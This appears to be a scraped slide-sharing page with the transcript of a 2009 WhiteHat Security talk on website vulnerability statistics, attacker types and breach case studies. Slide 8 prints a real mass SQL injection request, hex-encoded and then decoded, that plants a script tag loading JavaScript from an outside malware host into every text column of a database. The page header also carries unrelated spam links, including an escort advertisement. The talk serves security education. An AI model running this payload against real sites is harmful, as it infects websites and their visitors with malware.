EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

Security Religions & Risk Windows

  • 1. Security Religions & Risk Windows Jeremiah Grossman Founder & Chief Technology Officer 2009 © 2009 WhiteHat, Inc.
  • 2. Jeremiah Grossman • Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007) • Frequent international conference speaker • Co-founder of the Web Application Security Consortium • Co-author: Cross-Site Scripting Attacks • Former Yahoo! information security officer © 2009 WhiteHat Security, Inc. | Page 2
  • 3. WhiteHat Security • 250+ enterprise customers •Start-ups to Fortune 500 • Flagship offering “WhiteHat Sentinel Service” •1000’s of assessments performed annually • Recognized leader in website security •Quoted thousands of times by the mainstream press © 2009 WhiteHat, Inc. | Page 3
  • 4. WhiteHat Sentinel Complete Website Vulnerability Management Customer Controlled & Expert Managed • Unique SaaS-based solution – Highly scalable delivery of service at a fixed cost • Production Safe – No Performance Impact • Full Coverage – On-going testing for business logic flaws and technical vulnerabilities – uses WASC 24 classes of attacks as reference point • Unlimited Assessments – Anytime websites change • Eliminates False Positives – Security Operations Team verifies all vulnerabilities • Continuous Improvement & Refinement – Ongoing updates and enhancements to underlying technology and processes © 2009 WhiteHat, Inc. | Page 4
  • 5. Attacker Targeting Random Opportunistic • Fully automated scripts • Unauthenticated scans • Targets chosen indiscriminately Directed Opportunistic • Commercial and Open Source Tools • Authentication scans • Multi-step processes (forms) Fully Targeted • Customize their own tools • Focused on business logic • Clever and profit driven ($$$) © 2009 WhiteHat, Inc. | Page 5
  • 6. How the breach was detected: • 3rd party detection due to FRAUD (55%) • 3rd party detection NOT due to fraud (15%) • Employee Discovery (13%) • Unusual System Performance (11%) http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/
  • 7. Mass SQL Injection • Google recon for weak websites (*.asp, *.php) • Generic SQL Injection populates databases with malicious JavaScript IFRAMEs •(now over 2 million sites infected) • Visitors arrive and their browser auto-connects to a malware server infecting their machine with trojans -- or the website is damaged and can no longer conduct business. • Botnets form then continue SQL injecting websites • Infected sites risk becoming blacklisted on search engines and Web filtering gateways causing loss of visitors © 2009 WhiteHat, Inc. | Page 7
  • 8. "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast (0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5 220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973 6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6 22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39 39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206 22E78747970653D31363729204F50454E205461626C655F437572736F722046455443 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4 043205748494C4528404046455443485F5354415455533D302920424547494E206578 65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2 72B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874 74703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736 3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520 272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F736 46F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C 212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F 72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000)); EXEC(@S); HTTP/1.1" 200 6338 "-" Decoded... DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo. 1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor © 2009 WhiteHat, Inc. | Page 8
  • 9. ? = Hacker 1 Albert "Segvec" Gonzalez Victims Techniques TJ Maxx SQL Injection Barnes & Noble Sniffers BJ’s Wholesale Wireless Security / War Driving Boston Market Shared Passwords Hacker 2 DSW Shoe Warehouse Malware Forever 21 Anti-Forensics Office Max Backdoors Sports Authority Social Engineering Heartland Payment Systems Hannaford Brothers 7-Eleven Dave and Busters http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/ http://government.zdnet.com/?p=5242 http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech
  • 10. Business Goals & Budget Justification Risk Mitigation "If we spend $X on Y, we’ll reduce of risk of loss of $A by B%." Due Diligence "We must spend $X on Y because it’s an industry best-practice." Incident Response "We must spend $X on Y so that Z never happens again." Regulatory Compliance "We must spend $X on Y because <insert regulation> says so." Competitive Advantage "We must spend $X on Y to make the customer happy." © 2009 WhiteHat, Inc. | Page 10
  • 11. Security Religions Depth Breadth © 2009 WhiteHat, Inc. | Page 11
  • 12. WhiteHat Sentinel Statistics Data Set • Software-as-a-Service Website Vulnerability Assessment • Weekly testing for business logic flaws and technical vulnerabilities • Collection duration: January 1, 2006 to March 31, 2009 • Total websites: 1,031 • Identified vulnerabilities: 17,888 Key Findings • Unresolved vulnerabilities: 7,157 (60% resolution rate) • Websites having had at least one HIGH, CRITICAL, or URGENT issue: 82% • Lifetime average number of vulnerabilities per website: 17 • Websites currently with at least one HIGH, CRITICAL, or URGENT issue: 63% • Current average of unresolved vulnerabilities per website: 7 Percentage likelihood of a website having a vulnerability by severity CRITICAL HIGH URGENT © 2009 WhiteHat, Inc. | Page 12
  • 13. Website Classes of Attacks Business Logic: Humans Required Technical: Automation Can Identify Authentication Command Execution • Brute Force • Buffer Overflow • Insufficient Authentication • Format String Attack • Weak Password Recovery Validation • LDAP Injection • CSRF* • OS Commanding • SQL Injection Authorization • SSI Injection • Credential/Session Prediction • XPath Injection • Insufficient Authorization • Insufficient Session Expiration Information Disclosure • Session Fixation • Directory Indexing • Information Leakage Logical Attacks • Path Traversal • Abuse of Functionality • Predictable Resource Location • Denial of Service • Insufficient Anti-automation Client-Side • Insufficient Process Validation • Content Spoofing • Cross-site Scripting • HTTP Response Splitting* © 2009 WhiteHat, Inc. | Page 13
  • 14. WhiteHat Security Top Ten Percentage likelihood of a website having a vulnerability by class Cross-Site Scripting Information Leakage Content Spoofing Insufficient Authorization SQL Injection Predictable Resource Location Session Fixation Cross-Site Request Forgery Insufficient Authentication HTTP Response Splitting © 2009 WhiteHat, Inc. | Page 14
  • 15. Time-to-Fix (Days) Cross-Site Scripting Information Leakage Content Spoofing Insufficient Authorization SQL Injection Predictable Resource Location Session Fixation Cross-Site Request Forgery Insufficient Authentication HTTP Response Splitting Best-case scenario: Not all vulnerabilities have been fixed... © 2009 WhiteHat, Inc. | Page 15
  • 16. Resolution Rate - By Class Class of Attack % resolved severity Cross Site Scripting 20% urgent Insufficient Authorization 19% urgent SQL Injection 30% urgent HTTP Response Splitting 75% urgent Directory Traversal 53% urgent Insufficient Authentication 38% critical Cross-Site Scripting 39% critical Abuse of Functionality 28% critical Cross-Site Request Forgery 45% critical Session Fixation 21% critical Brute Force 11% high Content Spoofing 25% high HTTP Response Splitting 30% high Information Leakage 29% high Predictable Resource Location 26% high © 2009 WhiteHat, Inc. | Page 16
  • 17. Holiday Grinch-bots eBay’s "Holiday Doorbusters" promotion, administered by Strobe Promotions, was giving away 1,000 items -- 2009 corvette, plasma TVs, jet skis, diamond ring, etc -- to the first person to find and buy specially-marked $1 items. Some "contestants" used scripts, skipping to 'buy', without even viewing the goods. Almost 100% of the prizes were 'won' this way as evidenced by the visitor counters showing "0000." Many were not happy and complaining in the forums. Disappointed with eBays response, some took matters into their their owns hands listing "other" items for $1. "This is picture I took of my cat with my Cannon Powershot Camera after she overheard that people where using scripting to purchase HOLIDAY DOORBUSTERS items on eBay. Not responsible for poor scripting techniques." http://redtape.msnbc.com/2008/12/ebay-users-say.html © 2009 WhiteHat, Inc. | Page 17
  • 18. “The most secure email accounts on the planet” To get into a StrongWebmail account, the account owner must receive a verification call on their phone. This means that even if your password is stolen, the thief can’t access your email because they don’t have access to your telephone. http://www.strongwebmail.com/ © 2009 WhiteHat, Inc. | Page 18
  • 19. Break into my email: get $10,000. Here is my username and password. May 21, 2009 Break into my email: get $10,000. Here is my username and password. Username: CEO@StrongWebmail.com Password: Mustang85 StrongWebmail.com is offering $10,000 to the first person that breaks into our CEO’s StrongWebmail email account. And to make things easier, Strong Webmail is giving the username and password away! http://www.strongwebmail.com/news/secure-web-mail/break-into-my- email-get-10000-here-is-my-username-and-password/ © 2009 WhiteHat, Inc. | Page 19
  • 20. Lance James TwitPwn Aviv Raff http://twitpwn.com/ Mike Bailey http://www.asscert.com/ © 2009 WhiteHat, Inc. | Page 20
  • 21. The easiest route 1) Registered an account and identified multiple XSS issues in a matter of minutes (Rackspace WebMail software). 2) Sent ceo@strongwebmail.com an email laced with specially crafted JavaScript malware 3) Emailed support@strongwebmail.com stating they won the contest and sent details to the CEO encouraging them to check the account. 4) Within minutes the email were opened, which initiated several Ajax requests to the server, pilfering the inbox, and sending the data to a remote logging script. http://skeptikal.org/2009/06/strongwebmail-contest-won.html http://www.fireblog.com/exclusive-interview-with-strongwebmails-10000-hacker/ © 2009 WhiteHat, Inc. | Page 21
  • 22. The easiest route © 2009 WhiteHat, Inc. | Page 22
  • 23. The easiest route © 2009 WhiteHat, Inc. | Page 23
  • 24. StrongWebmail said it was "not deterred" by the contest's quick conclusion and would be launching a new competition once this bug was fixed. "We won't rest until we have created the most secure e-mail in the world," the company said. © 2009 WhiteHat, Inc. | Page 24
  • 25. Twitter Hacker Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com. Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo. Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice. Used the same password to compromise employee's email on Google Apps, steal hundreds of internal documents, and Owned! access Twitter's domains at GoDaddy. Sent to TechCrunch. Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using username/passwords and password recovery systems. “I’m sorry” - Hacker Croll http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ © 2009 WhiteHat, Inc. | Page 25
  • 26. Trading on Semi-public Information Business Wire provides a service where registered website users receive a stream of up-to-date press releases. Press releases are funneled to Business Wire by various organizations, which are sometimes embargoed temporarily because the information may affect the value of a stock. Press release files are uploaded to the Web server (Business Wire), but not linked, until the embargo is lifted. At such time, the press release Web pages are linked into the main website and users are notified with URLs similar to the following: http://website/press_release/08/29/2007/00001.html http://website/press_release/08/29/2007/00002.html http://website/press_release/08/29/2007/00003.html Before granting read access to the press release Web page, the system ensures the user is properly logged-in. © 2009 WhiteHat, Inc. | Page 26
  • 27. Just because you can't see it doesn't mean it's not there. An Estonian financial firm, Lohmus Haavel & Viisemann, discovered that the press release Web page URLs were named in a predictable fashion. And, while links might not yet exist because the embargo was in place, it didn’t mean a user couldn’t guess at the filename and gain access to the file. This method worked because the only security check Business Wire conducted was to ensure the user was properly logged-in, nothing more. According to the SEC, which began an investigation, Lohmus Haavel & Viisemann profited over $8 million by trading on the information they obtained. © 2009 WhiteHat, Inc. | Page 27
  • 28. A Ukrainian hacker breaks into Thomson Financial and steals a gloomy results announcement for IMS Health, hours before its release to the stock market ... • Hacker enters ~$42,000 in sell orders betting the stock will fall • The stock fell sharply making the hacker ~$300,000 • Red flags appear and the SEC freezes the funds • Funds are ordered to be released, “Dorozhko’s alleged ‘stealing and trading’ or ‘hacking and trading’ does not amount to a violation” of securities laws, Judge Naomi Reice Buchwald • The Times speculates that the DoJ has simply deemed the case not worth pursuing - probably due to the difficulties involved in gaining cooperation from local authorities to capture criminals in Ukraine. © 2009 WhiteHat, Inc. | Page 28
  • 29. Attack Classification Misnomer Dial is a measurement of target focus, NOT skill. © 2009 WhiteHat, Inc. | Page 29
  • 30. Operationalizing 1) Where do I start? Locate the websites you are responsible for 2) Where do I do next? Rank websites based upon business criticality 3) What should I be concerned about first? Risk Random Opportunistic, Directed Opportunistic, Fully Targeted 4) What is our current security posture? Vulnerability assessments, pen-tests, traffic monitoring Resources What is your organizations tolerance 5) How best to improve our survivability? for risk (per website)? SDL, virtual patch, configuration change, decommission, outsource, version roll-back, etc. © 2009 WhiteHat, Inc. | Page 30
  • 31. Operational Website Risk Management © 2009 WhiteHat, Inc. | Page 31
  • 32. © 2009 WhiteHat, Inc. | Page 32
  • 33. Thank You! Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com WhiteHat Security http://www.whitehatsec.com/ © 2009 WhiteHat, Inc.